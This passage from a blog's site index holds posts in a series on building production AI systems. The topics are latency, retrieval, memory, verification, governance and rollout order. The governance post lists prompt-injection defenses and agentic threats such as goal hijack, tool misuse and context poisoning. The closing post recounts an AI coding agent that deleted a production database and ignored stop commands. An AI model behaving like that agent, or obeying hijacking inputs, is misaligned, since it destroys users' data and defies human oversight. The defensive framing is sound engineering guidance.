rounds, majority of top 10 U.S. law firms. Abridge in clinical AI. ElevenLabs in voice. Regulatory complexity and proprietary data create barriers labs can&rsquo;t easily cross.\n3. Embedded platforms with data-gravity\nDatabricks at $62B. Once your data lives there, switching costs compound. The difference between point solutions (absorbed) and platforms (survive) is whether you become the system of record.\nWhat doesn&rsquo;t survive:\nHorizontal wrappers (Cursor vs. Claude Code, Grammarly vs. Office Editor) Standalone vector DBs (Pinecone lost Notion; pgvector absorbed simple use cases) &ldquo;Better ChatGPT&rdquo; plays Single-model dependencies The Survival Test Ask yourself three questions before building:\nDo you have a manufacturing moat? Physical complexity that takes years to replicate (NVIDIA, TSMC).\nDo you have a regulatory moat? Domain expertise in healthcare, legal, or finance where compliance is the product.\nDo you have data gravity? Are you the system of record where switching costs compound over time?\nIf you can&rsquo;t answer yes to at least one, you&rsquo;re building a feature\u2014not a company.\nThe Consolidation Trajectory In 1900, electricity was astonishing. By 1950, it was invisible. The fortunes went to GE (appliances), Westinghouse (factories), and utilities that became regulated monopolies.\nIn 2024, AI is astonishing. By 2035, it will be invisible.\nBut the electricity analogy breaks down in one critical way: the AI labs control generation, transmission, AND appliances. Standard Oil before the breakup, except the regulators haven&rsquo;t caught up.\nThe forecast: By 2028, the market consolidates around 3-4 vertically integrated giants (OpenAI, Anthropic, Google, possibly xAI). Everyone else fights for scraps in surviving niches: regulated verticals, data-gravity platforms, and chip suppliers.\nThe Playbook If You&rsquo;re&hellip; Bet On Avoid Investor Chips + vertical apps with regulatory moats Cloud capacity, horizontal wrappers, middleware without data gravity Builder Narrow vertical, model-agnostic, workflow embedding &ldquo;Better ChatGPT&rdquo; plays, single-model lock-in, features labs will ship Operator Multi-cloud, dual-source workflows, buy vertical tools Single provider lock-in, building horizontal internally The Uncertainty The Cursor paradox: $400M \u2192 $2.6B \u2192 $9.9B \u2192 $29.3B in 15 months. Fastest B2B scaling in SaaS history. And yet Claude Code ships, Copilot improves, the labs keep getting better at appliances.\nIs Cursor building a defensible relationship layer, or riding a temporary capability gap?\nI genuinely don&rsquo;t know. How long is the party gonna last? Will it get scooped up by the labs?\nThe barbell thesis gives false confidence. Vertical integration means the rules keep changing.\nLast updated: January 2026. This analysis reflects field conditions through Q4 2025.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/appliances-factories-grids\/","summary":"Own the chips or the customers. Everything else is a footnote.","title":"Appliances, Factories, Grids"},{"content":"From Blueprint to Build You&rsquo;ve learned:\nThe physics (Part 1) \u2014 latency and token economics The memory (Part 2) \u2014 context and tools The proof (Part 3) \u2014 verification and observability The guardrails (Part 4) \u2014 governance and practice Now: the build order. What to ship in what sequence.\nThe wrong order wastes effort. You can&rsquo;t tune latency without observability. You can&rsquo;t verify outputs without golden sets. You can&rsquo;t increase autonomy without governance.\nThis roadmap sequences infrastructure investments for maximum leverage.\n90-Day Path to Production Days 1-15: Foundation Goal: See what&rsquo;s happening. Establish baselines.\nDeploy observability stack\nTraces for all LLM calls (Part 3: Observability) Capture: prompt, response, latency, tokens, cost You can&rsquo;t improve what you can&rsquo;t measure Establish golden set\n50-100 hand-curated QA pairs for core use case Known-good answers you can test against (Part 3: Evals) Run on every change Implement L1 autonomy with tool use\nMCP server with typed schemas (Part 2: Tools) User drives, AI suggests Log every tool call Enable prompt caching\nStructure prompts: stable \u2192 semi-stable \u2192 variable (Part 1: Token Economics) Verify hit rates &gt;60% If lower, restructure prompts Exit criteria: You have traces, tests, and cache hit rate &gt;60%.\nDays 16-45: Optimization Goal: Make it fast, cheap, and verified.\nEnable speculative decoding\nDraft model proposes, target model verifies (Part 1: Latency) Tune draft lengths for your workload Expect 1.5-2.5x speedup in memory-bound scenarios Implement CI\/CD quality gates\nBlock deploys that fail faithfulness checks (Part 3: Evals as CI) Block deploys that regress latency SLOs No exceptions Adopt context compaction\nFor sessions &gt;10 turns: summarize to structured facts (Part 1: Context Compaction) Drop raw history, keep last 2-3 turns Target: 75% token reduction for long sessions Add hybrid retrieval\nVector search + BM25 + reranker (Part 2: Hybrid Retrieval) The reranker is where quality is won or lost Set freshness SLAs per source type Exit criteria: p95 latency &lt;500ms, quality gates in CI, hybrid retrieval live.\nDays 46-90: Advanced Architecture Goal: Scale safely. Increase autonomy.\nDecouple retrieval\nSearch stage: small chunks (100-256 tokens) for recall (Part 2: Decoupled Retrieval) Retrieve stage: large spans (1024+ tokens) for comprehension Mirrors human research: scan many, read deeply Implement GraphRAG or tool retrieval index\nIf entity\/relationship queries dominate: GraphRAG If agent tool selection at scale: tool retrieval index Only if needed; adds governance overhead Add memory tiers with governance\nWorking memory, episodic memory, semantic memory (Part 2: Memory Governance) Define: who owns memory, how it updates, when it must be forgotten User controls: view, correct, delete, export Promote to L2\/L3 autonomy\nOnly after runtime guardrails are verified (Part 4: Runtime Alignment) Policy configuration for what&rsquo;s blocked\/flagged\/allowed Prompt injection defense layers Establish cost attribution\nPer user, per feature Token SLOs with automated fallbacks (Part 1: Token SLOs) Breaches trigger alerts or model downgrades Exit criteria: Memory governance live, L2\/L3 autonomy with guardrails, cost attribution per feature.\nThe Sequencing Principle Notice the order:\nObservability first \u2014 you can&rsquo;t optimize blind Testing second \u2014 you can&rsquo;t ship without verification Speed third \u2014 fast failures are still failures Autonomy last \u2014 capability without governance is chaos Teams that invert this order ship fast, break things, and spend months in triage. The sequencing isn&rsquo;t arbitrary; it&rsquo;s load-bearing.\nThe Computer is Built You now have:\nPhysics (latency, tokens) that keep humans in the loop Memory and tools that don&rsquo;t hallucinate or break things Verification that catches errors before users Governance that enforces policy without retraining A roadmap that sequences investments correctly The foundation model is the CPU. You&rsquo;ve built the computer.\nNow ship it.\nNavigation \u2190 Part 4: Governance | Series Index\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part5-implementation\/","summary":"The build manifest: 90 days from foundation to production-ready autonomy. What to ship in what sequence.","title":"Model-Adjacent Products, Part 5: The Implementation Path"},{"content":"The Alignment Gap Your model is fast (Part 1), remembers (Part 2), and self-verifies (Part 3). It&rsquo;s capable and accurate.\nYet, it still might:\nGive out financial advice you&rsquo;re not licensed to provide Leak PII from its context window Execute a prompt that hijacks its goals Adding capability without proper governance is setting up for chaos. We cover alignment as a runtime surface for the computer; not a training-time prayer add-on.\nAlignment is a runtime product surface. Teams need new operational patterns.\nRuntime Alignment Policy Configuration Define what&rsquo;s blocked, flagged, or allowed without retraining:\npolicies: - name: &#34;no_financial_advice&#34; trigger: categories: [&#34;investment&#34;, &#34;stock_pick&#34;] action: &#34;block&#34; message: &#34;I can&#39;t provide financial advice.&#34; - name: &#34;pii_detection&#34; trigger: patterns: [&#34;ssn&#34;, &#34;credit_card&#34;] action: &#34;flag_for_review&#34; Transparent Enforcement When content is blocked, explain why. The bracketed policy name helps support debug:\nUser: &#34;Should I buy NVIDIA stock?&#34; System: &#34;I can&#39;t provide investment recommendations. [Policy: no_financial_advice]&#34; Prompt Injection Defense Treat it as a security problem with layers:\nInput sanitization \u2014 Control characters, unusual Unicode Instruction hierarchy \u2014 System prompts override user content Output validation \u2014 Responses don&rsquo;t leak injected instructions Monitoring \u2014 Alert on injection patterns OWASP Agentic Risks (2026) The OWASP Top 10 for Agentic Applications identifies new attack surfaces:\nAgent Goal Hijack \u2014 Adversarial inputs redirecting agent objectives Tool Misuse \u2014 Agents invoking tools in unintended ways Memory &amp; Context Poisoning \u2014 Hallucinations entering context, compounding over time Cascading Failures \u2014 Multi-agent systems amplifying errors across boundaries Context Poisoning Defense Multi-agent systems need &ldquo;isolation&rdquo; strategies:\nGive sub-agents their own context windows Validate outputs before they enter shared memory Implement &ldquo;context distraction&rdquo; detection (model over-focusing on long history) Guardrails vs Evals Different purposes, both required:\nGuardrails (Runtime): Enforce policy boundaries in real-time. Capture verdict (pass\/fail), category (PII, toxicity), trigger fallback action. Evaluations (Batch): Measure quality on scheduled test sets. Detect regression over time. Guardrails stop bad outputs now. Evals catch drift before it reaches users.\nProducts Product Why Model-Adjacent Cloudflare AI Gateway Policy enforcement at inference time Llama Guard 3 Model-based content filtering Lakera Guard Real-time protection against prompt attacks Team Practices Product Managers Latency is P0. Budget it per stage. Token cost is product cost. Evals gate shipping. No eval suite, no deploy. Engineers Prompts are code. Version, review, test. Caching is architecture. Design for hits from day one. Traces are mandatory. Infrastructure Model serving is the easy part. Everything else is harder. Freshness has SLAs. Re-indexing is a production system. Priority Checklist P0: Table Stakes Streaming UX (never freeze on slow responses) Prompt caching enabled Request tracing (prompt \u2192 response \u2192 latency \u2192 cost) One eval set in CI Basic guardrails P1: Production Ready Latency budgets (TTFT, per-token, p99) Fast-path \/ slow-path routing Retrieval with freshness SLAs and provenance Tool schemas with validation and permissions Judge-based verification Memory with user visibility and deletion P2: Mature Multi-tier caching Hybrid retrieval (vector + lexical + reranking) Memory compaction and conflict resolution Adversarial eval suite Policy UI for non-technical stakeholders Cost attribution per user\/feature The Computer is Built Think of the base model as the CPU for the computer (your product). The teams shipping successfully are well past just model routing &amp; selection. They&rsquo;re stitching the model-adjacent infrastructure: latency engineering, token economics, retrieval, tools, memory, verification, alignment. We have a new CPU, now let&rsquo;s build our computers.\nYou now have:\nPhysics (latency, tokens) that keep humans in the loop Memory and tools that don&rsquo;t hallucinate or break things Verification that catches errors before users Governance that enforces policy without retraining The foundation model is the CPU. You&rsquo;ve built the computer.\nPart 5 gives you the build order: 90 days from foundation to production-ready autonomy.\nSources Alignment\nConstitutional AI (Anthropic) Llama Guard Animals vs Ghosts (Karpathy) Prompt Security\nHackAPrompt \u2014 Injection taxonomy Indirect Prompt Injection Lakera Guide 2025-2026 Updates\nOWASP Top 10 for Agentic Applications 2026 (Giskard) \u2014 Context poisoning, tool misuse AI Agent Landscape 2025-2026 (Tao An) \u2014 Multi-agent architecture risks 7 Agentic AI Trends to Watch in 2026 \u2014 Bounded autonomy patterns Practices\nThe State of LLMs 2025 (Raschka) Levels of Autonomy (Knight Institute) Navigation \u2190 Part 3: Quality Gates | Series Index | Part 5: Implementation Path \u2192\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part4-governance\/","summary":"Alignment as a runtime surface, policy enforcement without retraining. Team practices that ship.","title":"Model-Adjacent Products, Part 4: Governance & Practice"},{"content":"The Hypothesis Problem You&rsquo;ve built a fast model (Part 1) with memory and tools (Part 2). It now generates answers and takes actions at scale. An uncomfortable truth: every output is a hypothesis. The model doesn&rsquo;t know it&rsquo;s right. It&rsquo;s predicting tokens. Sometimes those predictions are brilliant. Sometimes they&rsquo;re confident hallucinations. Your job becomes to tell the difference before users do.\nModel outputs are hypotheses. Verification, observability, and evals determine whether those hypotheses survive production.\nVerifiability &ldquo;Verifiability is to AI what specifiability was to 1980s computing.&rdquo; \u2014 Karpathy\nA verifiable environment is resettable (new attempts possible), efficient (many attempts), and rewardable (automated scoring). Models spike in math, code, and puzzles because RLVR applies. They struggle with open-ended creative tasks because there&rsquo;s no clear reward signal.\nYour verification infrastructure doesn&rsquo;t just catch errors; it enables capability. The tasks where you build strong verification become the tasks where your product improves.\nVerification Pipeline Treat outputs as proposals to be tested.\nflowchart LR O[Output] --> S{Syntax} S -->|Pass| E{Execute} S -->|Fail| F1[Error] E -->|Pass| J{Judge} E -->|Fail| F2[Error] J -->|Pass| Done[\"\u2713 Verified\"] J -->|Escalate| H[Human Review] Text description of diagram Left-to-right flowchart showing the verification pipeline for model outputs. Output enters Syntax check: if fail, goes to Error; if pass, proceeds to Execute check: if fail, goes to Error; if pass, proceeds to Judge (LLM or human evaluation): if pass, marked as Verified with checkmark; if Escalate, sent to Human Review. Three gates (Syntax, Execute, Judge) filter outputs before they reach production.\nExecution-Based For code, SQL, or executable output:\ndef verify_code(code: str, tests: list) -&gt; Result: try: ast.parse(code) # Syntax except SyntaxError: return Result(passed=False, stage=&#34;syntax&#34;) sandbox = Sandbox(timeout=5) sandbox.exec(code) # Execute for test in tests: # Validate if not test.passes(sandbox): return Result(passed=False, stage=&#34;test&#34;) return Result(passed=True) LLM-as-Judge For subjective quality, use a separate model:\nEvaluate on: Accuracy, Completeness, Clarity, Safety Score 1-5. Flag issues below 3. Self-Consistency For high-stakes decisions, sample multiple times. Disagreement triggers review or voting.\nObservability What you don&rsquo;t measure, you can&rsquo;t improve. What you don&rsquo;t trace, you can&rsquo;t debug.\nTrace Structure Every request produces a trace:\n{ &#34;trace_id&#34;: &#34;tr_abc123&#34;, &#34;stages&#34;: [ {&#34;name&#34;: &#34;routing&#34;, &#34;duration_ms&#34;: 25}, {&#34;name&#34;: &#34;cache&#34;, &#34;result&#34;: &#34;hit&#34;}, {&#34;name&#34;: &#34;generation&#34;, &#34;tokens&#34;: {&#34;in&#34;: 1200, &#34;out&#34;: 340}} ], &#34;total_ms&#34;: 258, &#34;cost_usd&#34;: 0.0034 } What to Track Per-request: Latency by stage, token counts, cache hit\/miss, tool calls, safety outcomes.\nAggregate: p50\/p95\/p99 latency, cache hit rates, error rates by type, cost per user\/feature.\nThe Minimal Viable Stack Comprehensive Logging \u2014 Capture prompts, contexts, tool calls, responses Tracing \u2014 Step-level timing and token usage for chains and agents Evaluation \u2014 Automated scoring (LLM-as-judge or heuristics) against golden sets Gates \u2014 Block merges if faithfulness or latency SLOs regress Drift Detection Embedding drift tracks semantic shifts in model behavior that traditional metrics miss. Deploy monitors to catch when your model&rsquo;s responses drift from expected distributions.\nProducts (2026 Landscape) Product Best For Notable Features Braintrust Live monitoring + alerts BTQL filters; tool tracing; cost attribution; AI agents for baseline detection Arize Phoenix Drift + RAG metrics Advanced embedding drift detection; RAG-specific observability DeepEval LLM unit tests Pytest-style testing; synthetic data monitoring; CI\/CD integration Langfuse Prompt versioning Token-level cost tracking; open-source option Helicone Full-spectrum observability User\/model interaction journeys; caching; cost attribution W&amp;B Weave Experiment tracking Evaluations Playground; systematic tests against golden datasets Evals Shipping without evals is shipping without tests.\nDataset Types Golden set: Hand-curated, known-good answers. Run on every change.\nRegression set: Previously failed cases. Prevents backsliding.\nAdversarial set: Jailbreaks, prompt injections, edge cases.\nEvals as CI on: push: paths: [&#39;prompts\/**&#39;] jobs: eval: steps: - run: python eval\/run.py --suite golden --threshold 0.95 - run: python eval\/run.py --suite regression --threshold 1.0 - run: python eval\/run.py --suite adversarial --threshold 0.99 Prompt changes don&rsquo;t merge without passing evals.\nProducts Product Why Model-Adjacent Braintrust LLM-as-judge with calibration Patronus AI Test case generation from production failures Galileo Factual inconsistency detection Sources Verification\nVerifiability (Karpathy) Chain-of-Verification (ACL 2024) Self-Consistency Improves CoT Evals\nHELM: Holistic Evaluation Judging LLM-as-a-Judge 2025-2026 Updates\nProduction RAG in 2025: Evaluation Suites, CI\/CD Quality Gates (Dextralabs) \u2014 Golden sets, automated gates Top 10 LLM Observability Tools 2025 (Braintrust) \u2014 Tooling comparison Complete Guide to LLM Observability 2026 (Portkey) \u2014 Guardrails vs evals distinction What&rsquo;s Next Verification catches errors. But not all errors are quality problems; some are policy violations.\n&ldquo;Should I help with this?&rdquo; is different from &ldquo;Is this answer correct?&rdquo;\nPart 4 covers governance: the runtime policy layer that defines what the model should and shouldn&rsquo;t do.\nNavigation \u2190 Part 2: Context &amp; Tools | Series Index | Part 4: Governance \u2192\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part3-quality\/","summary":"Model outputs are hypotheses that need verification pipelines to catch errors before users do.","title":"Model-Adjacent Products, Part 3: Quality Gates"},{"content":"The Goldfish Problem A model without memory is a goldfish; every conversation starts from zero, every user a stranger. A model without tools is a brain in a jar, capable of thought but incapable of action. Part 1 made the model fast; this part gives it memory and hands. But memory that hallucinates is worse than no memory. Tools without permissions are security holes. Most products fail here, not from lack of capability, but from lack of discipline.\nRetrieval, memory, and tool systems define what the model knows and what it can do. Get these wrong and the model hallucinates or fails silently.\nRetrieval Systems RAG is not &ldquo;add a vector database.&rdquo; It&rsquo;s a cache hierarchy with freshness policies and provenance.\nCache Hierarchy flowchart TB subgraph L1[\"L1: Prompt Cache \u2014 60-90% hit\"] P[System prompts] end subgraph L2[\"L2: Embedding Cache \u2014 20-40% hit\"] E[Query embeddings] end subgraph L3[\"L3: Result Cache \u2014 10-30% hit\"] RC[\"(query, version) \u2192 chunks\"] end subgraph L4[\"L4: Document Store\"] D[Ground truth] end L1 --> L2 --> L3 --> L4 Text description of diagram Top-to-bottom flowchart showing a 4-level RAG cache hierarchy. L1 Prompt Cache (60-90% hit rate) contains system prompts. L2 Embedding Cache (20-40% hit rate) contains query embeddings. L3 Result Cache (10-30% hit rate) maps (query, version) pairs to chunks. L4 Document Store holds ground truth. Each level flows to the next, trading freshness for speed.\nEach level trades freshness for speed. Make these tradeoffs explicit.\nFreshness SLAs Source Max Staleness Trigger Support tickets 5 min Webhook Product docs 4 hours Git push Policies 24 hours Manual publish Historical data 7 days Batch job Hybrid Retrieval Vector search misses keyword matches. Keyword search misses semantic similarity. Use both.\nflowchart LR Q[Query] --> V[Vector Search] Q --> B[BM25 Search] V --> RRF[Reciprocal Rank Fusion] B --> RRF RRF --> R[Final Results] Text description of diagram Left-to-right flowchart showing hybrid retrieval. Query splits into two parallel paths: Vector Search (semantic similarity) and BM25 Search (keyword matching). Both results feed into Reciprocal Rank Fusion (RRF) which combines rankings, then outputs Final Results. This hybrid approach catches both semantic and exact keyword matches.\nThe reranker is where quality is won or lost.\nDecoupled Retrieval (2025 Pattern) Separate search from retrieve:\nSearch stage: Small chunks (100-256 tokens) maximize recall during initial lookup Retrieve stage: Larger spans (1024+ tokens) provide sufficient context for comprehension This mirrors how humans research: scan many sources quickly, then read deeply.\nRetrieval Design Trade-offs Design When It Shines Failure Modes Vector (HNSW) Unstructured semantic search Misses exact matches; embedding drift Hybrid (BM25+Vector) Mixed keyword + semantic Higher latency; reranker costs GraphRAG Entity\/relationship Q&amp;A Schema governance overhead Tool Retrieval Index Agent tool selection at scale Tool sprawl; index staleness Products Product Why Model-Adjacent Cohere Rerank Attention over query-document pairs Voyage AI Embedding geometry optimization Jina AI Token-level similarity (ColBERT) Memory Architecture Memory has become a product category in its own right; users expect AI to remember. They also expect control.\nThree Types Episodic: What happened, when. &ldquo;Last week you asked about refund policies.&rdquo;\nSemantic: Stable facts. &ldquo;User&rsquo;s company is Acme Corp.&rdquo;\nProcedural: How to work with this user. &ldquo;When user says &lsquo;ship it&rsquo;, deploy to staging.&rdquo;\nCompaction Raw logs grow unbounded. Convert to structured facts periodically.\nBefore: 200 turns, 50KB After: facts + preferences + recent context, 2KB\nUser Control (Non-Negotiable) View what&rsquo;s remembered Correct inaccuracies Delete specific memories Export data Regulation increasingly mandates this. Build it in from day one.\nMemory Governance Layer Enterprise memory architectures now define:\nWorking memory: Immediate context for current task Episodic memory: Logs of past sessions and actions Semantic memory: Consolidated facts and relationships Governance policies: Who owns memory, how it updates, when it must be forgotten Products Product Why Model-Adjacent Zep Temporal knowledge graphs, entity relationships Mem0 Automatic memory extraction from conversations LangGraph Checkpoint\/restore for multi-step agents Tool Ecosystems Once agents call real systems, stringly-typed prompt integrations break; tools graduate from convenience features to load-bearing infrastructure.\nMCP: The Protocol Shift Model Context Protocol makes tools discoverable and self-describing.\nBefore: Every integration is custom code. After: Tools discovered at runtime with typed schemas.\nMCP Industry Status (2026) MCP has become the &ldquo;USB-C for AI&rdquo;:\n5,800+ servers published, 300+ clients integrated Adopted by OpenAI (Agents SDK), Google (Gemini), Microsoft (VS Code, Copilot), Salesforce (Agentforce) Donated to Linux Foundation&rsquo;s Agentic AI Foundation (Dec 2025) Stop building bespoke connectors. The protocol war is over.\nSchema Quality Bad:\n{&#34;name&#34;: &#34;search&#34;, &#34;description&#34;: &#34;Search for stuff&#34;} Good:\n{ &#34;name&#34;: &#34;knowledge_base_search&#34;, &#34;description&#34;: &#34;Search internal docs. Use for policy questions. NOT for real-time data.&#34;, &#34;parameters&#34;: { &#34;query&#34;: {&#34;type&#34;: &#34;string&#34;, &#34;minLength&#34;: 3}, &#34;doc_type&#34;: {&#34;enum&#34;: [&#34;policy&#34;, &#34;product&#34;, &#34;how-to&#34;]} } } The model will misuse bad schemas.\nPermissions tool: database_query permissions: allowed_tables: [orders, customers] denied_columns: [ssn, credit_card] rate_limit: 100\/hour Log every call: who, what, when, and the prompt context that triggered it.\nProducts Product Why Model-Adjacent Anthropic MCP Typed schemas models can reliably parse OpenAI Function Calling JSON mode requires output constraint knowledge Toolhouse Sandboxing for unpredictable model calls Sources Retrieval\nRAG for Knowledge-Intensive NLP \u2014 Original RAG paper ColBERT: Efficient Passage Search Memory\nMemGPT: LLMs as Operating Systems Tools\nA Deep Dive Into MCP (a16z) Toolformer 2025-2026 Updates\nFrom RAG to Context: 2025 Year-End Review (RAGFlow) \u2014 Decoupled pipelines, tool retrieval MCP Enterprise Adoption Guide (Gupta, 2025) \u2014 5,800 servers, industry adoption A 2026 Memory Stack for Enterprise Agents (Mishra) \u2014 Memory tier architecture Why MCP Won (The New Stack, 2025) What&rsquo;s Next Context and tools give models knowledge and capability. But capability without verification is liability.\nEvery output is a hypothesis. Every action is a proposal. Part 3 covers the quality gates that turn proposals into safe executions.\nNavigation \u2190 Part 1: Architecture | Series Index | Part 3: Quality Gates \u2192\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part2-context-tools\/","summary":"Memory and hands for the model: retrieval that doesn&rsquo;t hallucinate. Tools that don&rsquo;t break production.","title":"Model-Adjacent Products, Part 2: Context & Tools"},{"content":"Why Speed Matters At L1 (copilot), the human drives. They can tolerate a slow AI; it&rsquo;s just making suggestions. At L3 (consultant), the AI executes and the human approves. If that approval window takes 3 seconds to render, the human disengages. By L4, slow means unsafe.\nLatency isn&rsquo;t a nice-to-have. It&rsquo;s the difference between a tool that augments and one that frustrates into abandonment.\nThis part covers the physics: making AI fast enough that humans stay engaged, and trust it enough to delegate.\nThink of the foundation model as the CPU; your product is the computer you build around it.\nA CPU without memory, I\/O, and an OS is useless. Same for a foundation model without context management, tool orchestration, and verification. Model-adjacent infrastructure turns stochastic text generation into shippable software.\nThe Stack Seven layers make up the model-adjacent stack; lower layers (1-3) enable capability. Upper layers (5-7) gate trust. You can&rsquo;t safely increase autonomy without investing in both.\nblock-beta columns 1 L7[\"7. Alignment & Governance\"] L6[\"6. Observability & Evals\"] L5[\"5. Verification\"] L4[\"4. Memory\"] L3[\"3. Tools & Action\"] L2[\"2. Retrieval & Context\"] L1[\"1. Latency & Interactivity\"] FM[\"Foundation Model\"] Text description of diagram Vertical stack diagram showing 8 layers of model-adjacent architecture, from bottom to top: Foundation Model (base), Layer 1: Latency &amp; Interactivity, Layer 2: Retrieval &amp; Context, Layer 3: Tools &amp; Action, Layer 4: Memory, Layer 5: Verification, Layer 6: Observability &amp; Evals, Layer 7: Alignment &amp; Governance. Lower layers (1-3) enable capability. Upper layers (5-7) gate trust.\nLayers 1-3 determine what&rsquo;s possible. Latency keeps humans in the loop. Retrieval reduces hallucination. Tool permissions create hard boundaries.\nLayers 5-7 determine what&rsquo;s safe. Verification gates autonomous execution. Observability enables audit trails. Governance defines the ceiling.\nLatency Engineering Classic SaaS tolerated 200ms response times. Model-adjacent products need sub-50ms perceived latency, or immediate streaming.\nFast-Path \/ Slow-Path Route most requests through a fast path. Reserve expensive reasoning for the tail.\nNew post: nanochat miniseries v1\nThe correct way to think about LLMs is that you are not optimizing for a single specific model but for a family models controlled by a single dial (the compute you wish to spend) to achieve monotonically better results. This allows you to do\u2026 pic.twitter.com\/84OwpSODcS\n&mdash; Andrej Karpathy (@karpathy) January 7, 2026 flowchart LR Q[Query] --> R{Router} R -->|80%| F[Fast Path] R -->|20%| S[Slow Path] F --> O[Output] S --> O Text description of diagram Left-to-right flowchart showing request routing. Query enters a Router which splits traffic: 80% goes to Fast Path, 20% goes to Slow Path. Both paths converge to Output. Fast path uses cache plus small model. Slow path requires retrieval plus large model plus tools.\nMost requests hit cache + small model. 20% need retrieval + large model + tools.\nLatency Budget (500ms target) Stage Budget Routing 30ms Cache lookup 10ms Retrieval 80ms Model (TTFT) 200ms Safety check 50ms Tools 100ms Buffer 30ms Track p50 and p99 separately. Tail latency is where users churn.\nTechniques Streaming. Show partial tokens. Users tolerate longer waits when they see progress.\nSpeculative decoding. Draft model proposes, target model verifies batches. vLLM with Eagle 3 achieves 2.5x inference speedup and 1.8x latency reduction in memory-bound scenarios (low request rates). Benefits diminish at high throughput without workload-specific tuning; test your actual traffic pattern.\nTwo-pass generation. Fast draft now, refinement later. Let users interrupt if the draft suffices.\nAsync tools. &ldquo;Let me check that&hellip;&rdquo; with a spinner beats blocking.\nProducts Product Why Model-Adjacent vLLM PagedAttention requires understanding KV cache memory patterns TensorRT-LLM Kernel fusion, quantization requires compute graph knowledge llama.cpp INT4\/INT8 without quality loss requires weight distribution knowledge Fireworks AI Draft\/verify pattern requires understanding token prediction Token Economics Tokens translate directly to compute, latency, and cost; manage them like CPU and memory budgets.\nPrompt Structure Prompt caching rewards stable prefixes:\nSTABLE: System instructions, tool defs, examples SEMI-STABLE: Retrieved context, user preferences VARIABLE: Current conversation, query Put stable content first. Cache hit rates go from 0% to 70%+.\nCost Impact Structure Cache Rate Cost\/1K requests Bad (variable first) 0% $12.00 Good (stable first) 70% $4.80 Optimal (prefix sharing) 85% $2.70 Context Compaction Long conversations accumulate tokens. After N turns: summarize into structured facts, drop raw history, keep last 2-3 turns.\nBefore: [System] + [20 turns] = 12,000 tokens After: [System] + [Facts] + [3 turns] = 3,000 tokens\nToken SLOs Establish Service Level Objectives for cost and latency:\np95 latency target per request type (e.g., &lt;500ms for chat, &lt;2s for analysis) Cost-per-request ceiling by feature (e.g., $0.01 for suggestions, $0.05 for generation) Cache hit rate floor (e.g., &gt;70% for prompt cache) Breaches trigger alerts or automated fallbacks to smaller models. Track per user\/feature for attribution.\nProducts Product Why Model-Adjacent Anthropic Prompt Caching Requires understanding attention computation reuse SGLang Radix attention, prefix sharing requires tree-structured attention knowledge Martian \/ Not Diamond Routing requires understanding model capability boundaries Sources Latency &amp; Serving\nEfficient Memory Management for LLMs with PagedAttention (vLLM) Fast Inference via Speculative Decoding TensorRT-LLM Token Economics\nPrompt Caching (Anthropic) SGLang: Efficient Execution 2025-2026 Updates\nFaster Inference with vLLM &amp; Speculative Decoding (Red Hat, 2025) \u2014 Eagle 3 benchmarks AI Agent Landscape 2025-2026 (Tao An) \u2014 Context compaction patterns What&rsquo;s Next Latency and token economics are the physics. They determine what&rsquo;s possible. But physics alone doesn&rsquo;t create memory or capability.\nPart 2 tackles memory (and the cost of forgetting) and tools (and the cost of breaking things).\nNavigation \u2190 Part 0: The Autonomy Ladder | Series Index | Part 2: Context &amp; Tools \u2192\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part1-architecture\/","summary":"The physics of production AI: latency engineering that keeps humans in the loop. Token economics that don&rsquo;t bankrupt you.","title":"Model-Adjacent Products, Part 1: The Architecture"},{"content":"The Capability Trap In July 2025, a developer using an AI coding assistant asked it to help debug a database issue. The agent was capable; it could browse files, execute commands, and modify code. Within minutes, it had deleted the customer&rsquo;s production database.\nWorse: when the developer tried to stop it, the agent ignored the commands and continued executing.\nThis wasn&rsquo;t a rogue AI. The agent did exactly what its architecture allowed: it had capability without boundaries, authority without accountability, and no governance layer to enforce &ldquo;ask before destructive actions.&rdquo;\nThe incident, documented in the AI Incident Database, joined a growing list: AI agents purchasing items without consent, chatbots fabricating policies that cost companies lawsuits, customer support bots inventing explanations.\nCapability without accountability is chaos.\nThe Autonomy Ladder AI isn&rsquo;t synonymous with autonomy. The spectrum runs from assistance to augmentation to full autonomy, and exploring that range unlocks far more diverse use-cases than shooting straight for L5.\nLevel Role Human AI Examples L1: Copilot User drives, AI suggests Makes all decisions Offers options ChatGPT, Siri L2: Collaborator AI drafts, user edits Refines outputs Creates first drafts GitHub Copilot, Notion AI L3: Consultant AI executes, user approves Reviews and approves Executes after permission Cursor Agent, Devin L4: Approver AI acts, user reviews exceptions Handles edge cases Acts within bounds DataDog AIOps L5: Observer AI autonomous, user monitors Monitors dashboards Full autonomy Self-healing infra Most products today sit at L2-L3. The infrastructure you build determines how far up you can safely climb.\nHere&#39;s my enormous round-up of everything we learned about LLMs in 2025 - the third in my annual series of reviews of the past twelve monthshttps:\/\/t.co\/HD9Zf85SG2\nThis year it&#39;s divided into 26 sections! This is the table of contents: pic.twitter.com\/DFlzgXudLy\n&mdash; Simon Willison (@simonw) December 31, 2025 flowchart LR subgraph L1[\"L1: Copilot\"] A1[User drives] end subgraph L2[\"L2: Collaborator\"] A2[AI drafts] end subgraph L3[\"L3: Consultant\"] A3[AI executes] end subgraph L4[\"L4: Approver\"] A4[AI acts] end subgraph L5[\"L5: Observer\"] A5[AI autonomous] end L1 --> L2 --> L3 --> L4 --> L5 Text description of diagram Horizontal flowchart showing the 5 autonomy levels as connected stages progressing left to right: L1 Copilot (User drives) \u2192 L2 Collaborator (AI drafts) \u2192 L3 Consultant (AI executes) \u2192 L4 Approver (AI acts) \u2192 L5 Observer (AI autonomous). Arrows indicate progression through levels, with each level requiring increasing infrastructure maturity and accountability structures. Most products today sit at L2-L3.\nWhy Autonomy Requires Different Mental Models Autonomy isn&rsquo;t new. Robotics researchers have studied human-machine autonomy for fifty years. But applying those frameworks to LLMs requires translating across domains.\nThe Ghost Perspective (Karpathy) LLMs are &ldquo;summoned ghosts, not evolved animals.&rdquo; They emerged from different optimization pressure; not survival, but solving problems and getting upvotes.\nGhosts lack:\nContinuity \u2014 hence memory systems Embodiment \u2014 hence verification Social intelligence \u2014 